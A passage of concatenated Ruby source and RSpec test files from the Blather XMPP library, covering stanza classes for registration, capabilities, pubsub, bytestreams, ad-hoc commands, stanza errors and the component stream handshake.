require 'spec_helper'

# Sample XEP-0077 (In-Band Registration) result stanza used by the
# import spec below.
def ibr_xml
  <<-XML
  <iq type='result' id='reg1'>
    <query xmlns='jabber:iq:register'>
      <instructions>
        Choose a username and password for use with this service.
        Please also provide your email address.
      </instructions>
      <username/>
      <password/>
      <email/>
    </query>
  </iq>
  XML
end

describe Blather::Stanza::Iq::IBR do
  let(:ibr) { Blather::Stanza::Iq::IBR.new }
  # Deliberately contains XML metacharacters to exercise escaping.
  let(:test_string) { "<a&a>" }

  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:query, 'jabber:iq:register')).to eq(Blather::Stanza::Iq::IBR)
  end

  it 'can be imported' do
    node = Blather::XMPPNode.parse ibr_xml
    expect(node).to be_instance_of Blather::Stanza::Iq::IBR
  end

  describe '#registered' do
    subject { ibr.registered? }

    it { is_expected.to be false }

    # The predicate must round-trip whatever boolean was assigned.
    [true, false].each do |flag|
      context flag.to_s do
        subject do
          ibr.registered = flag
          ibr.registered?
        end

        it { is_expected.to be flag }
      end
    end
  end

  describe '#remove?' do
    subject { ibr.remove? }

    it { is_expected.to be false }

    context '#remove!' do
      subject do
        ibr.remove!
        ibr.remove?
      end

      it { is_expected.to be true }
    end
  end

  describe '#form' do
    subject { ibr.form }

    it { is_expected.to be_instance_of Blather::Stanza::X }
  end

  # Every simple registration field accessor must round-trip an
  # arbitrary string. Generates one describe per field, identical to
  # the original hand-written examples.
  %w[instructions username nick password name first last
     email address city state zip phone url date].each do |field|
    describe "##{field}" do
      subject do
        ibr.send(:"#{field}=", test_string)
        ibr.send(field)
      end

      it { is_expected.to eq test_string }
    end
  end
end
<file_sep>/spec/blather/stanza/presence/c_spec.rb
require 'spec_helper'

# Sample XEP-0115 entity-capabilities presence used by the specs below.
def c_xml
  <<-XML
  <presence from='<EMAIL>/globe'>
    <c xmlns='http://jabber.org/protocol/caps'
       hash='sha-1'
       node='http://www.chatopus.com'
       ver='zHyEOgxTrkpSdGcQKH8EFPLsriY='/>
  </presence>
  XML
end

describe 'Blather::Stanza::Presence::C' do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:c, 'http://jabber.org/protocol/caps' )).to eq(Blather::Stanza::Presence::C)
  end

  it 'must be importable' do
    caps = Blather::XMPPNode.parse c_xml
    expect(caps).to be_kind_of Blather::Stanza::Presence::C::InstanceMethods
    expect(caps.hash).to eq(:'sha-1')
    expect(caps.node).to eq('http://www.chatopus.com')
    expect(caps.ver).to eq('zHyEOgxTrkpSdGcQKH8EFPLsriY=')
  end

  it 'ensures hash is one of Blather::Stanza::Presence::C::VALID_HASH_TYPES' do
    expect { Blather::Stanza::Presence::C.new nil, nil, :invalid_type_name }.to raise_error(Blather::ArgumentError)

    # Every whitelisted algorithm must be accepted and normalized to a symbol.
    Blather::Stanza::Presence::C::VALID_HASH_TYPES.each do |algorithm|
      caps = Blather::Stanza::Presence::C.new nil, nil, algorithm
      expect(caps.hash).to eq(algorithm.to_sym)
    end
  end

  it 'can set a hash on creation' do
    caps = Blather::Stanza::Presence::C.new nil, nil, :md5
    expect(caps.hash).to eq(:md5)
  end

  it 'can set a node on creation' do
    caps = Blather::Stanza::Presence::C.new 'http://www.chatopus.com'
    expect(caps.node).to eq('http://www.chatopus.com')
  end

  it 'can set a ver on creation' do
    caps = Blather::Stanza::Presence::C.new nil, 'zHyEOgxTrkpSdGcQKH8EFPLsriY='
    expect(caps.ver).to eq('zHyEOgxTrkpSdGcQKH8EFPLsriY=')
  end

  it 'is equal on import and creation' do
    parsed = Blather::XMPPNode.parse c_xml
    built = Blather::Stanza::Presence::C.new 'http://www.chatopus.com', 'zHyEOgxTrkpSdGcQKH8EFPLsriY=', 'sha-1'
    expect(parsed).to eq(built)
  end
end
<file_sep>/spec/blather/stanza/pubsub/unsubscribe_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'

# Specs for the pubsub <unsubscribe/> stanza wrapper. Heavy use of raw
# XPath assertions pins the exact element/attribute layout on the wire.
describe Blather::Stanza::PubSub::Unsubscribe do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:unsubscribe, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Unsubscribe)
  end

  it 'can be imported' do
    # unsubscribe_xml comes from fixtures/pubsub.
    expect(Blather::XMPPNode.parse(unsubscribe_xml)).to be_instance_of Blather::Stanza::PubSub::Unsubscribe
  end

  it 'ensures an unsubscribe node is present on create' do
    unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node', 'jid'
    expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
  end

  it 'ensures an unsubscribe node exists when calling #unsubscribe' do
    # Strip the auto-created child, then confirm the accessor recreates it.
    unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node', 'jid'
    unsubscribe.pubsub.remove_children :unsubscribe
    expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty

    expect(unsubscribe.unsubscribe).not_to be_nil
    expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
  end

  it 'defaults to a set node' do
    unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node', 'jid'
    expect(unsubscribe.type).to eq(:set)
  end

  it 'sets the host if requested' do
    unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'pubsub.jabber.local', 'node', 'jid'
    expect(unsubscribe.to).to eq(Blather::JID.new('pubsub.jabber.local'))
  end

  it 'sets the node' do
    unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node-name', 'jid'
    expect(unsubscribe.node).to eq('node-name')
  end

  it 'has a node attribute' do
    # Reader and writer must both stay in sync with the node= attribute.
    unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node-name', 'jid'
    expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@node="node-name"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(unsubscribe.node).to eq('node-name')

    unsubscribe.node = 'new-node'
    expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@node="new-node"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(unsubscribe.node).to eq('new-node')
  end

  it 'has a jid attribute' do
    # The jid accessor wraps the raw attribute in a Blather::JID.
    unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node-name', 'jid'
    expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@jid="jid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(unsubscribe.jid).to eq(Blather::JID.new('jid'))

    unsubscribe.jid = Blather::JID.new('n@d/r')
    expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@jid="n@d/r"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(unsubscribe.jid).to eq(Blather::JID.new('n@d/r'))
  end

  it 'has a subid attribute' do
    # subid is optional: absent unless passed at construction or assigned.
    unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node-name', 'jid'
    expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@subid="subid"]', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty

    unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node-name', 'jid', 'subid'
    expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@subid="subid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(unsubscribe.subid).to eq('subid')

    unsubscribe.subid = 'newsubid'
    expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@subid="newsubid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(unsubscribe.subid).to eq('newsubid')
  end
end
<file_sep>/spec/blather/stanza/iq/s5b_spec.rb
require 'spec_helper'

# XEP-0065 SOCKS5 Bytestreams session-initiation IQ carrying two
# candidate streamhosts, used by the import/getter specs below.
def s5b_open_xml
  <<-XML
  <iq from='<EMAIL>/foo'
      id='hu3vax16'
      to='<EMAIL>/bar'
      type='set'>
    <query xmlns='http://jabber.org/protocol/bytestreams'
           sid='vxf9n471bn46'>
      <streamhost
          jid='<EMAIL>/foo'
          host='192.168.4.1'
          port='5086'/>
      <streamhost
          jid='<EMAIL>/foo'
          host='192.168.4.2'
          port='5087'/>
    </query>
  </iq>
  XML
end

describe Blather::Stanza::Iq::S5b do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:query, 'http://jabber.org/protocol/bytestreams')).to eq(Blather::Stanza::Iq::S5b)
  end

  it 'can be imported' do
    stanza = Blather::XMPPNode.parse s5b_open_xml
    expect(stanza).to be_instance_of Blather::Stanza::Iq::S5b
  end

  it 'can get sid' do
    stanza = Blather::XMPPNode.parse s5b_open_xml
    expect(stanza.sid).to eq('vxf9n471bn46')
  end

  it 'can get streamhosts' do
    stanza = Blather::XMPPNode.parse s5b_open_xml
    expect(stanza.streamhosts.size).to eq(2)
  end

  it 'can set streamhosts' do
    # Both hash literals and StreamHost instances are accepted.
    stanza = Blather::Stanza::Iq::S5b.new
    stanza.streamhosts += [{:jid => '<EMAIL>/foo', :host => '192.168.5.1', :port => 123}]
    expect(stanza.streamhosts.size).to eq(1)

    stanza.streamhosts += [Blather::Stanza::Iq::S5b::StreamHost.new('<EMAIL>/foo', '192.168.5.2', 123)]
    expect(stanza.streamhosts.size).to eq(2)
  end

  it 'can get and set streamhost-used' do
    stanza = Blather::Stanza::Iq::S5b.new
    stanza.streamhost_used = 'used<EMAIL>/foo'
    expect(stanza.streamhost_used.jid.to_s).to eq('used<EMAIL>/foo')
  end
end
<file_sep>/spec/blather_spec.rb
require 'spec_helper'

# Specs for the top-level Blather logging facade.
describe Blather do
  describe "while accessing to Logger object" do
    it "should return a Logger instance" do
      expect(Blather.logger).to be_instance_of Logger
    end
  end

  describe "while using the log method" do
    # Restore the default level so later specs see debug-level logging
    # (spec_helper's before hook also reassigns the logger each example).
    after do
      Blather.default_log_level = :debug
    end

    it "should forward to debug by default" do
      Blather.logger.expects(:debug).with("foo bar").once
      Blather.log "foo bar"
    end

    # Each configured default level must route Blather.log to the
    # matching Logger method.
    %w<debug info error fatal>.each do |val|
      it "should forward to #{val} if configured that default level" do
        Blather.logger.expects(val.to_sym).with("foo bar").once
        Blather.default_log_level = val.to_sym
        Blather.log "foo bar"
      end
    end
  end
end
<file_sep>/lib/blather/core_ext/ipaddr.rb
# @private
#
# Adds RFC 1918 private-range helpers to Ruby's stdlib IPAddr.
# Note: this intentionally deviates from (and, on Ruby >= 2.5,
# overrides) stdlib IPAddr#private? — here non-IPv4 addresses are
# never considered private.
class IPAddr
  # The three IPv4 private address blocks defined by RFC 1918.
  PrivateRanges = [
    IPAddr.new("10.0.0.0/8"),
    IPAddr.new("172.16.0.0/12"),
    IPAddr.new("192.168.0.0/16")
  ].freeze

  # @return [Boolean] true if this is an IPv4 address inside one of
  #   the RFC 1918 private ranges; false for any other address,
  #   including all IPv6 addresses.
  def private?
    return false unless ipv4?
    # Enumerable#any? replaces the original manual each/return loop.
    PrivateRanges.any? { |range| range.include?(self) }
  end

  # @return [Boolean] the complement of #private?
  def public?
    !private?
  end
end
<file_sep>/lib/blather/stanza/pubsub/errors.rb
module Blather
  class Stanza
    # # PubSub Error Stanza
    #
    # Thin PubSub subclass exposing the stanza-level +node+ attribute
    # on error replies.
    #
    # @private
    class PubSubErrors < PubSub
      # @return [String, nil] the value of the node attribute
      def node
        read_attr :node
      end

      # Write the node attribute.
      def node=(value)
        write_attr :node, value
      end
    end # PubSubErrors
  end # Stanza
end # Blather
<file_sep>/spec/blather/stanza/iq/query_spec.rb
require 'spec_helper'

# Specs for the generic <query/> IQ stanza wrapper.
describe Blather::Stanza::Iq::Query do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:query, nil)).to eq(Blather::Stanza::Iq::Query)
  end

  it 'can be imported' do
    string = <<-XML
      <iq from='<EMAIL>/balcony' type='set' id='roster_4'>
        <query>
          <item jid='<EMAIL>' subscription='remove'/>
        </query>
      </iq>
    XML
    expect(Blather::XMPPNode.parse(string)).to be_instance_of Blather::Stanza::Iq::Query
  end

  it 'ensures a query node is present on create' do
    query = Blather::Stanza::Iq::Query.new
    expect(query.xpath('query')).not_to be_empty
  end

  it 'ensures a query node exists when calling #query' do
    # Strip the auto-created child, then confirm the accessor recreates it.
    query = Blather::Stanza::Iq::Query.new
    query.remove_child :query
    expect(query.xpath('query')).to be_empty

    expect(query.query).not_to be_nil
    expect(query.xpath('query')).not_to be_empty
  end

  [:get, :set, :result, :error].each do |type|
    it "can be set as \"#{type}\"" do
      query = Blather::Stanza::Iq::Query.new type
      expect(query.type).to eq(type)
    end
  end

  it 'sets type to "result" on reply' do
    query = Blather::Stanza::Iq::Query.new
    expect(query.type).to eq(:get)
    # FIX: dropped the useless `reply =` assignment — the expectation's
    # return value was never used.
    expect(query.reply.type).to eq(:result)
  end

  it 'sets type to "result" on reply!' do
    query = Blather::Stanza::Iq::Query.new
    expect(query.type).to eq(:get)
    query.reply!
    expect(query.type).to eq(:result)
  end

  it 'can be registered under a namespace' do
    class QueryNs < Blather::Stanza::Iq::Query; register :query_ns, nil, 'query:ns'; end
    expect(Blather::XMPPNode.class_from_registration(:query, 'query:ns')).to eq(QueryNs)
    query_ns = QueryNs.new
    expect(query_ns.xpath('query')).to be_empty
    expect(query_ns.xpath('ns:query', :ns => 'query:ns').size).to eq(1)

    # Repeated #query calls must not create duplicate children.
    query_ns.query
    query_ns.query
    expect(query_ns.xpath('ns:query', :ns => 'query:ns').size).to eq(1)
  end
end
<file_sep>/lib/blather/stream/component.rb
module Blather
  class Stream
    # @private
    #
    # Stream implementation for external components (XEP-0114, Jabber
    # Component Protocol): connects under the jabber:component:accept
    # namespace and authenticates via the <handshake/> digest exchange
    # instead of SASL.
    class Component < Stream
      NAMESPACE = 'jabber:component:accept'

      # Handle a node parsed off the wire.
      #
      # A <handshake/> from the server means authentication succeeded,
      # so mark the stream ready; anything else goes to the generic
      # Stream handler. When the (error-free) stream header is seen,
      # answer with the XEP-0114 handshake digest:
      # SHA1(stream id + shared secret).
      def receive(node) # :nodoc:
        if node.element_name == 'handshake'
          ready!
        else
          super
        end

        # NOTE(review): this XPath runs against every received node's
        # document — presumably only the stream-open document matches,
        # producing a single handshake; verify against Stream/Parser.
        if node.document.find_first('/stream:stream[not(stream:error)]', :xmlns => NAMESPACE, :stream => STREAM_NS)
          send "<handshake>#{Digest::SHA1.hexdigest(node['id']+@password)}</handshake>"
        end
      end

      # Send a stanza, stamping this component's JID as the "from"
      # address when the stanza supports it and has none set.
      def send(stanza)
        stanza.from ||= self.jid if stanza.respond_to?(:from) && stanza.respond_to?(:from=)
        super stanza
      end

      # Open the component stream: build a fresh parser and emit the
      # stream header addressed to our component JID.
      def start
        @parser = Parser.new self
        send "<stream:stream to='#{@jid}' xmlns='#{NAMESPACE}' xmlns:stream='#{STREAM_NS}'>"
      end

      # Finish the parser (if one was started) before generic cleanup.
      def cleanup
        @parser.finish if @parser
        super
      end
    end #Client
  end #Stream
end #Blather
<file_sep>/spec/spec_helper.rb
require 'blather'
require 'countdownlatch'
Dir[File.dirname(__FILE__) + "/support/**/*.rb"].each {|f| require f}
RSpec.configure do |config|
  # Use mocha (not rspec-mocks) for stubbing and message expectations.
  config.mock_with :mocha

  # Allow running only examples tagged :focus; fall back to the whole
  # suite when nothing is tagged.
  config.filter_run :focus => true
  config.run_all_when_everything_filtered = true

  config.before(:each) do
    # Run EventMachine's scheduled/deferred callbacks inline so specs
    # stay synchronous.
    EM.stubs(:schedule).yields
    EM.stubs(:defer).yields

    # Verbose parser logging to $stdout for easier failure diagnosis.
    Blather::Stream::Parser.debug = true
    Blather.logger = Logger.new($stdout).tap { |logger| logger.level = Logger::DEBUG }
  end
end
# Parse a raw XML string into a Nokogiri document for spec assertions.
def parse_stanza(string)
  Nokogiri::XML.parse(string)
end
# Whether the suite is running under JRuby.
# Note: `=~` returns a match position (Integer) or nil — not a strict
# boolean — so this is intended for truthiness checks only.
def jruby?
  RUBY_PLATFORM =~ /java/
end
<file_sep>/spec/blather/stanza/iq/command_spec.rb
require 'spec_helper'
# Sample XEP-0050 Ad-Hoc Commands result stanza (with an embedded
# jabber:x:data form) used by the import/default-action specs below.
def command_xml
  <<-XML
  <iq type='result'
      from='catalog.shakespeare.lit'
      to='<EMAIL>/orchard'
      id='form2'>
    <command xmlns='http://jabber.org/protocol/commands'
             node='node1'
             sessionid='dqjiodmqlmakm'>
      <x xmlns='jabber:x:data' type='form'>
        <field var='field-name' type='text-single' label='description' />
      </x>
    </command>
  </iq>
  XML
end
describe Blather::Stanza::Iq::Command do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:command, 'http://jabber.org/protocol/commands')).to eq(Blather::Stanza::Iq::Command)
end
it 'must be importable' do
expect(Blather::XMPPNode.parse(command_xml)).to be_instance_of Blather::Stanza::Iq::Command
end
it 'ensures a command node is present on create' do
c = Blather::Stanza::Iq::Command.new
expect(c.xpath('xmlns:command', :xmlns => Blather::Stanza::Iq::Command.registered_ns)).not_to be_empty
end
it 'ensures a command node exists when calling #command' do
c = Blather::Stanza::Iq::Command.new
c.remove_children :command
expect(c.xpath('ns:command', :ns => Blather::Stanza::Iq::Command.registered_ns)).to be_empty
expect(c.command).not_to be_nil
expect(c.xpath('ns:command', :ns => Blather::Stanza::Iq::Command.registered_ns)).not_to be_empty
end
Blather::Stanza::Iq::Command::VALID_ACTIONS.each do |valid_action|
it "provides a helper (#{valid_action}?) for action #{valid_action}" do
expect(Blather::Stanza::Iq::Command.new).to respond_to :"#{valid_action}?"
end
end
Blather::Stanza::Iq::Command::VALID_STATUS.each do |valid_status|
it "provides a helper (#{valid_status}?) for status #{valid_status}" do
expect(Blather::Stanza::Iq::Command.new).to respond_to :"#{valid_status}?"
end
end
Blather::Stanza::Iq::Command::VALID_NOTE_TYPES.each do |valid_note_type|
it "provides a helper (#{valid_note_type}?) for note_type #{valid_note_type}" do
expect(Blather::Stanza::Iq::Command.new).to respond_to :"#{valid_note_type}?"
end
end
[:cancel, :execute, :complete, :next, :prev].each do |action|
it "action can be set as \"#{action}\"" do
c = Blather::Stanza::Iq::Command.new nil, nil, action
expect(c.action).to eq(action)
end
end
[:get, :set, :result, :error].each do |type|
it "can be set as \"#{type}\"" do
c = Blather::Stanza::Iq::Command.new type
expect(c.type).to eq(type)
end
end
it 'sets type to "result" on reply' do
c = Blather::Stanza::Iq::Command.new
expect(c.type).to eq(:set)
reply = expect(c.reply.type).to eq(:result)
end
# reply! mutates the receiver in place rather than returning a copy.
it 'sets type to "result" on reply!' do
c = Blather::Stanza::Iq::Command.new
expect(c.type).to eq(:set)
c.reply!
expect(c.type).to eq(:result)
end
it 'removes action on reply' do
c = Blather::XMPPNode.parse command_xml
expect(c.action).to eq(:execute)
expect(c.reply.action).to eq(nil)
end
it 'removes action on reply!' do
c = Blather::XMPPNode.parse command_xml
expect(c.action).to eq(:execute)
c.reply!
expect(c.action).to eq(nil)
end
it 'can be registered under a namespace' do
class CommandNs < Blather::Stanza::Iq::Command; register :command_ns, nil, 'command:ns'; end
expect(Blather::XMPPNode.class_from_registration(:command, 'command:ns')).to eq(CommandNs)
c_ns = CommandNs.new
expect(c_ns.xpath('command')).to be_empty
expect(c_ns.xpath('ns:command', :ns => 'command:ns').size).to eq(1)
# Calling #command twice on purpose: the accessor must be idempotent and
# not create a duplicate child node.
c_ns.command
c_ns.command
expect(c_ns.xpath('ns:command', :ns => 'command:ns').size).to eq(1)
end
it 'is constructed properly' do
n = Blather::Stanza::Iq::Command.new :set, "node", :execute
n.to = '<EMAIL>'
expect(n.find("/iq[@to='<EMAIL>' and @type='set' and @id='#{n.id}']/ns:command[@node='node' and @action='execute']", :ns => Blather::Stanza::Iq::Command.registered_ns)).not_to be_empty
end
# Action defaults to :execute when unset.
it 'has an action attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.action).to eq(:execute)
n.action = :cancel
expect(n.action).to eq(:cancel)
end
it 'must default action to :execute on import' do
n = Blather::XMPPNode.parse(command_xml)
expect(n.action).to eq(:execute)
end
# Status defaults to :executing when unset.
it 'has a status attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.status).to eq(:executing)
n.status = :completed
expect(n.status).to eq(:completed)
end
# Note: assigning a sessionid stores its SHA1 digest, not the raw value.
it 'has a sessionid attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.sessionid).to eq(nil)
n.sessionid = "somerandomstring"
expect(n.sessionid).to eq(Digest::SHA1.hexdigest("somerandomstring"))
end
it 'has a sessionid? attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.sessionid?).to eq(false)
n.new_sessionid!
expect(n.sessionid?).to eq(true)
end
# :execute is always implicitly present in allowed_actions, so the
# assertions compare set-difference instead of exact equality.
it 'has an allowed_actions attribute' do
n = Blather::XMPPNode.parse command_xml
expect(n.allowed_actions).to eq([:execute])
n.allowed_actions = [:next, :prev]
expect(n.allowed_actions - [:next, :prev, :execute]).to be_empty
n.remove_allowed_actions!
expect(n.allowed_actions).to eq([:execute])
n.allowed_actions += [:next]
expect(n.allowed_actions - [:next, :execute]).to be_empty
r = Blather::Stanza::Iq::Command.new
expect(r.allowed_actions).to eq([:execute])
r.allowed_actions += [:prev]
expect(r.allowed_actions - [:prev, :execute]).to be_empty
end
it 'has a primary_allowed_action attribute' do
n = Blather::XMPPNode.parse command_xml
expect(n.primary_allowed_action).to eq(:execute)
n.primary_allowed_action = :next
expect(n.primary_allowed_action).to eq(:next)
end
it 'has a note_type attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.note_type).to eq(nil)
n.note_type = :info
expect(n.note_type).to eq(:info)
end
it 'has a note_text attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.note_text).to eq(nil)
n.note_text = "Some text"
expect(n.note_text).to eq("Some text")
expect(n.note.content).to eq("Some text")
end
# The x-data form is exposed as a Blather::Stanza::X instance.
it 'makes a form child available' do
n = Blather::XMPPNode.parse(command_xml)
expect(n.form.fields.size).to eq(1)
expect(n.form.fields.map { |f| f.class }.uniq).to eq([Blather::Stanza::X::Field])
expect(n.form).to be_instance_of Blather::Stanza::X
r = Blather::Stanza::Iq::Command.new
r.form.type = :form
expect(r.form.type).to eq(:form)
end
# The <x/> form node must live under <command/>, not directly under <iq/>.
it 'ensures the form child is a child of command' do
r = Blather::Stanza::Iq::Command.new
r.form
expect(r.command.xpath('ns:x', :ns => Blather::Stanza::X.registered_ns)).not_to be_empty
expect(r.xpath('ns:x', :ns => Blather::Stanza::X.registered_ns)).to be_empty
end
end
<file_sep>/lib/blather/stanza/iq/ibb.rb
module Blather
  class Stanza
    class Iq
      # # In-Band Bytestreams Stanza
      #
      # [XEP-0047: In-Band Bytestreams](http://xmpp.org/extensions/xep-0047.html)
      #
      # Base class for the three IBB stanzas: Open, Data and Close. Each
      # nested class registers its own handler and exposes the session id
      # (`sid`) of the transfer it belongs to.
      #
      # @handler :ibb_open
      # @handler :ibb_data
      # @handler :ibb_close
      class Ibb < Iq
        # @private
        NS_IBB = 'http://jabber.org/protocol/ibb'

        # Build a reply stanza, stripping any <open/>, <close/> or <data/>
        # children so the reply is a bare result IQ.
        #
        # @see Blather::Stanza#reply
        def reply
          response = super
          [:open, :close, :data].each do |child_name|
            response.remove_children child_name
          end
          response
        end

        # An IBB session-open stanza
        class Open < Ibb
          register :ibb_open, :open, NS_IBB

          # The <open/> element of the stanza
          #
          # @return [Nokogiri::XML::Element]
          def open
            find_first('ns:open', :ns => NS_IBB)
          end

          # The session id of the file transfer
          #
          # @return [String]
          def sid
            open['sid']
          end
        end

        # An IBB data-chunk stanza
        class Data < Ibb
          register :ibb_data, :data, NS_IBB

          # The <data/> element of the stanza
          #
          # @return [Nokogiri::XML::Element]
          def data
            find_first('ns:data', :ns => NS_IBB)
          end

          # The session id of the file transfer
          #
          # @return [String]
          def sid
            data['sid']
          end
        end

        # An IBB session-close stanza
        class Close < Ibb
          register :ibb_close, :close, NS_IBB

          # The <close/> element of the stanza
          #
          # @return [Nokogiri::XML::Element]
          def close
            find_first('ns:close', :ns => NS_IBB)
          end

          # The session id of the file transfer
          #
          # @return [String]
          def sid
            close['sid']
          end
        end
      end
    end
  end
end
<file_sep>/lib/blather/errors/stanza_error.rb
module Blather
  # Stanza errors
  # RFC3920 Section 9.3 (http://xmpp.org/rfcs/rfc3920.html#stanzas-error)
  #
  # @handler :stanza_error
  class StanzaError < BlatherError
    # Namespace for the defined error conditions
    # @private
    STANZA_ERR_NS = 'urn:ietf:params:xml:ns:xmpp-stanzas'
    # @private
    VALID_TYPES = [:cancel, :continue, :modify, :auth, :wait].freeze

    register :stanza_error

    attr_reader :original, :name, :type, :text, :extras

    # Factory method for instantiating the proper class for the error
    #
    # @param [Blather::XMPPNode] node the stanza containing an <error/> node
    # @return [Blather::StanzaError]
    def self.import(node)
      original = node.copy
      original.remove_child 'error'
      error_node = node.find_first '//*[local-name()="error"]'
      # The defined condition is the first non-<text/> child of <error/>
      name = error_node.find_first('child::*[name()!="text"]', STANZA_ERR_NS).element_name
      type = error_node['type']
      text = node.find_first 'descendant::*[name()="text"]', STANZA_ERR_NS
      text = text.content if text
      # Anything that is neither the condition nor <text/> is extra payload
      extras = error_node.find("descendant::*[name()!='text' and name()!='#{name}']").map { |n| n }
      self.new original, name, type, text, extras
    end

    # Create a new StanzaError
    #
    # @param [Blather::XMPPNode] original the original stanza
    # @param [String] name the error name
    # @param [#to_s] type the error type as specified in
    #   [RFC3920](http://xmpp.org/rfcs/rfc3920.html#rfc.section.9.3.2)
    # @param [String, nil] text additional text for the error
    # @param [Array<Blather::XMPPNode>] extras an array of extra nodes to add
    def initialize(original, name, type, text = nil, extras = [])
      @original = original
      @name = name
      self.type = type
      @text = text
      @extras = extras
    end

    # Set the error type
    #
    # @param [#to_sym] type the new error type. Must be one of
    #   Blather::StanzaError::VALID_TYPES
    # @raise [ArgumentError] if the type is not valid
    # @see [RFC3920 Section 9.3.2](http://xmpp.org/rfcs/rfc3920.html#rfc.section.9.3.2)
    def type=(type)
      type = type.to_sym
      if !VALID_TYPES.include?(type)
        raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
      end
      @type = type
    end

    # The error name as a symbol (dashes converted to underscores)
    #
    # @return [Symbol]
    def name
      @name.gsub('-','_').to_sym
    end

    # Creates an XML node from the error
    #
    # @return [Blather::XMPPNode]
    def to_node
      node = self.original.reply
      node.type = 'error'
      node << (error_node = XMPPNode.new('error'))
      # The condition element keeps the raw dashed @name, not the
      # underscored #name accessor
      error_node << (err = XMPPNode.new(@name, error_node.document))
      error_node['type'] = self.type
      # Fixed: use the STANZA_ERR_NS constant instead of repeating the
      # namespace string literal (it was hardcoded twice below)
      err.namespace = STANZA_ERR_NS
      if self.text
        error_node << (text = XMPPNode.new('text', error_node.document))
        text.namespace = STANZA_ERR_NS
        text.content = self.text
      end
      self.extras.each { |extra| error_node << extra.dup }
      node
    end

    # Convert the object to a proper node then convert it to a string
    #
    # @return [String]
    def to_xml(*args)
      to_node.to_xml(*args)
    end

    # @private
    def inspect
      "Stanza Error (#{@name}): #{self.text} [#{self.extras}]"
    end

    # @private
    alias_method :to_s, :inspect
  end # StanzaError
end # Blather
<file_sep>/spec/blather/stanza/pubsub_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:pubsub, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub)
  end

  # Description typo fixed: "pubusb" -> "pubsub"
  it 'ensures a pubsub node is present on create' do
    pubsub = Blather::Stanza::PubSub.new
    expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_nil
  end

  it 'ensures a pubsub node exists when calling #pubsub' do
    pubsub = Blather::Stanza::PubSub.new
    pubsub.remove_children :pubsub
    expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSub.registered_ns)).to be_nil
    expect(pubsub.pubsub).not_to be_nil
    expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_nil
  end

  it 'sets the host if requested' do
    aff = Blather::Stanza::PubSub.new :get, 'pubsub.jabber.local'
    expect(aff.to).to eq(Blather::JID.new('pubsub.jabber.local'))
  end

  it 'ensures newly inherited items are PubSubItem objects' do
    pubsub = Blather::XMPPNode.parse(items_all_nodes_xml)
    expect(pubsub.items.map { |i| i.class }.uniq).to eq([Blather::Stanza::PubSub::PubSubItem])
  end
end
describe Blather::Stanza::PubSub::PubSubItem do
it 'can be initialized with just an ID' do
id = 'foobarbaz'
item = Blather::Stanza::PubSub::Items::PubSubItem.new id
expect(item.id).to eq(id)
end
it 'can be initialized with a payload' do
payload = 'foobarbaz'
item = Blather::Stanza::PubSub::Items::PubSubItem.new 'foo', payload
expect(item.payload).to eq(payload)
end
it 'allows the payload to be set' do
item = Blather::Stanza::PubSub::Items::PubSubItem.new
expect(item.payload).to be_nil
item.payload = 'testing'
expect(item.payload).to eq('testing')
expect(item.content).to eq('testing')
end
# Assigning nil clears any existing payload children.
it 'allows the payload to be unset' do
payload = 'foobarbaz'
item = Blather::Stanza::PubSub::Items::PubSubItem.new 'foo', payload
expect(item.payload).to eq(payload)
item.payload = nil
expect(item.payload).to be_nil
end
